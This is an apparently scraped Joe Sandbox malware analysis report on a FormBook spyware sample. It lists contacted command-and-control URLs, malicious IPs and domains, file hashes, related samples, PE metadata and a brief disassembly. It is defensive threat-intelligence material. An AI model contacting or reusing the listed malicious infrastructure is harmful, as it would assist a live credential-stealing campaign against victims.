                                              http://www.litespeedtech.com/error-pagemobsync.exe, 00000005.00000002.3897126671.0000000005704000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002E024000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002E08000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqWmobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002F9A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5amobsync.exe, 00000005.00000002.3897126671.0000000005896000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          45.141.156.114
                                                          logidant.xyzGermany
                                                          30860YURTEH-ASUAtrue
                                                          165.154.96.210
                                                          fap-a13f5c64.faipod.comCanada
                                                          7456INTERHOPCAfalse
                                                          27.124.4.246
                                                          r0lqcud7.nbnnn.xyzSingapore
                                                          64050BCPL-SGBGPNETGlobalASNSGfalse
                                                          188.114.96.3
                                                          www.zkdamdjj.shopEuropean Union
                                                          13335CLOUDFLARENETUSfalse
                                                          103.224.182.242
                                                          www.madhf.techAustralia
                                                          133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                          185.27.134.206
                                                          www.canadavinreport.siteUnited Kingdom
                                                          34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                          104.21.36.62
                                                          www.izmirescortg.xyzUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          134.0.14.158
                                                          aballanet.catSpain
                                                          197712CDMONsistemescdmoncomEStrue
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588375
                                                          Start date and time:2025-01-11 01:38:21 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 47s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:tfWjjV1LdT.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@9/8
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 275
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          No simulations
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          45.141.156.114M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/iuvu/
                                                          Recibos.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/ctvu/
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/iuvu/
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/iuvu/
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/ctvu/
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/ctvu/
                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/iuvu/
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • www.logidant.xyz/ctvu/
                                                          165.154.96.210M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • www.yunlekeji.top/t322/
                                                          27.124.4.246PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/sgdd/
                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/sgdd/
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/36be/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/sgdd/
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/sgdd/
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • www.laohub10.net/sgdd/
                                                          188.114.96.3M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • www.zkdamdjj.shop/kf1m/
                                                          https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • cocteldedeas.mx/rx567/
                                                          ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                          • www.zrichiod-riech.sbs/kf10/
                                                          KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                          • www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P
                                                          1162-201.exeGet hashmaliciousFormBookBrowse
                                                          • www.einpisalpace.shop/pgw3/
                                                          https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005Get hashmaliciousUnknownBrowse
                                                          • jackoffjackofflilliilkillxoopoeadonline.top/drive/
                                                          KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                          • www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
                                                          GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                          • /api/get/dll
                                                          Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                          QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • filetransfer.io/data-package/u7ghXEYp/download
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          r0lqcud7.nbnnn.xyzuG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          order confirmation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 23.225.159.42
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          www.madhf.techM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          PO2412010.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.224.182.242
                                                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 15.204.67.7
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          www.izmirescortg.xyzGz2FxKx2cM.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.36.62
                                                          M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.36.62
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 172.67.186.192
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.36.62
                                                          fap-a13f5c64.faipod.comM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 165.154.96.210
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          BCPL-SGBGPNETGlobalASNSGM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                          • 134.122.133.80
                                                          NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                          • 134.122.133.80
                                                          xsYbMYg5Dr.exeGet hashmaliciousUnknownBrowse
                                                          • 137.220.229.26
                                                          https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                          • 134.122.133.80
                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • 202.95.11.110
                                                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                          • 202.95.11.110
                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • 202.95.11.110
                                                          0Z2lZiPk5K.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • 134.122.133.80
                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                          • 134.122.135.48
                                                          YURTEH-ASUAM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                          • 152.89.61.96
                                                          https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                          • 31.42.184.242
                                                          Recibos.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • 45.141.156.114
                                                          INTERHOPCAM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 165.154.96.210
                                                          arm4.elfGet hashmaliciousMiraiBrowse
                                                          • 165.154.119.54
                                                          i686.elfGet hashmaliciousMiraiBrowse
                                                          • 165.154.144.14
                                                          la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                          • 165.154.119.65
                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 165.154.120.14
                                                          https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                                                          • 165.154.182.38
                                                          firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                          • 165.154.232.175
                                                          http://www771771u.com/Get hashmaliciousUnknownBrowse
                                                          • 165.154.224.29
                                                          http://www.choeshop.comGet hashmaliciousUnknownBrowse
                                                          • 165.154.254.46
                                                          PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 165.154.0.120
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\mobsync.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\tfWjjV1LdT.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.995842706440756
                                                          Encrypted:true
                                                          SSDEEP:6144:gyMzoDqhz3W5VMKRY5pwFslIXjjL9YwurD1OXqj8Iu879UpJ0I0M:6oDqhzsMpwGIzMfkXBR62py9M
                                                          MD5:77929550A3F86CC051FA8F3E7450E297
                                                          SHA1:A3E7577B038E3D7F78D2449BB68A440E9A214EC6
                                                          SHA-256:E27EE42B6014D5A9B824FC10A5EB5359A59DB781D0C62C1BCBF12EF7C9CFE873
                                                          SHA-512:E78D994F47EFF564CBDD5BE00EC4972982F8EB7B305AD029D05D5D518FB9A1691B7B0D84428AF5938FB63C02E133503ED601D992282B03C8A0607887A6AA6911
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...6ANRJEUG3..YW.1R7LH57.JU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3.4YWJ..9L.<.d.Tz.o."(&gC?[>%%\rT-&[X1j7Sb<'$a<)..{.w)^6RbE8=aJU6BNRJ8TN.pT>.yQ5.q(R._...x.5.[...qT>.^...p(R..#6^..5.AUG3M4YW.tR7.I47.b.VBNRJAUG3.4[VO0Y7L.17EJU6BNRJ.AG3M$YWDQV7LHu7EZU6BLRJGUG3M4YWB1R7LH57E*Q6BLRJAUG3O4..D1B7LX57EJE6B^RJAUG3]4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57k>0N6NRJ5.C3M$YWDaV7LX57EJU6BNRJAUG3m4Y7D1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YW
                                                          Process:C:\Users\user\Desktop\tfWjjV1LdT.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.995842706440756
                                                          Encrypted:true
                                                          SSDEEP:6144:gyMzoDqhz3W5VMKRY5pwFslIXjjL9YwurD1OXqj8Iu879UpJ0I0M:6oDqhzsMpwGIzMfkXBR62py9M
                                                          MD5:77929550A3F86CC051FA8F3E7450E297
                                                          SHA1:A3E7577B038E3D7F78D2449BB68A440E9A214EC6
                                                          SHA-256:E27EE42B6014D5A9B824FC10A5EB5359A59DB781D0C62C1BCBF12EF7C9CFE873
                                                          SHA-512:E78D994F47EFF564CBDD5BE00EC4972982F8EB7B305AD029D05D5D518FB9A1691B7B0D84428AF5938FB63C02E133503ED601D992282B03C8A0607887A6AA6911
                                                          Malicious:false
                                                          Preview:...6ANRJEUG3..YW.1R7LH57.JU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3.4YWJ..9L.<.d.Tz.o."(&gC?[>%%\rT-&[X1j7Sb<'$a<)..{.w)^6RbE8=aJU6BNRJ8TN.pT>.yQ5.q(R._...x.5.[...qT>.^...p(R..#6^..5.AUG3M4YW.tR7.I47.b.VBNRJAUG3.4[VO0Y7L.17EJU6BNRJ.AG3M$YWDQV7LHu7EZU6BLRJGUG3M4YWB1R7LH57E*Q6BLRJAUG3O4..D1B7LX57EJE6B^RJAUG3]4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57k>0N6NRJ5.C3M$YWDaV7LX57EJU6BNRJAUG3m4Y7D1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YW
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.208137501076956
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:tfWjjV1LdT.exe
                                                          File size:1'225'216 bytes
                                                          MD5:c3689a08e5e324cde3000e0da0261633
                                                          SHA1:f937a0c9e37aeeb64b71799637ce45ed8cd27d1c
                                                          SHA256:bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c
                                                          SHA512:76150d4398121a05cd71136836434ec9d74fac039dfc41724bdd258f66f8278a1fae733a77855603947e937ae3156ef73c4d2af50d1a6584f7431aa3abfd559f
                                                          SSDEEP:24576:bu6J33O0c+JY5UZ+XC0kGso6Fam2e3IU9FXcPEi1uyC4HnWY:Vu0c++OCvkGs9Fam2UXIyVY
                                                          TLSH:0145CE2273DDC360CB669173BF6AB7016EBF7C610630B85B2F980D7DA950162162D7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67524AD4 [Fri Dec 6 00:52:36 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007F9FD0BA5A2Ah
                                                          jmp 00007F9FD0B987F4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F9FD0B9897Ah
                                                          cmp edi, eax
                                                          jc 00007F9FD0B98CDEh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007F9FD0B98979h
                                                          rep movsb
                                                          jmp 00007F9FD0B98C8Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007F9FD0B98B44h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F9FD0B98980h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007F9FD0B98E50h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007F9FD0B98B1Dh
                                                          test edi, 00000003h
                                                          jne 00007F9FD0B98B2Eh
                                                          test esi, 00000003h
                                                          jne 00007F9FD0B98B0Dh
                                                          bt edi, 02h
                                                          jnc 00007F9FD0B9897Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F9FD0B98983h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F9FD0B989D5h
                                                          bt esi, 03h
                                                          jnc 00007F9FD0B98A28h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x628b0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc70000x628b00x62a006642b70470777a6c5b5f26c63212c8d9False0.9331803509188846data7.906311393291615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
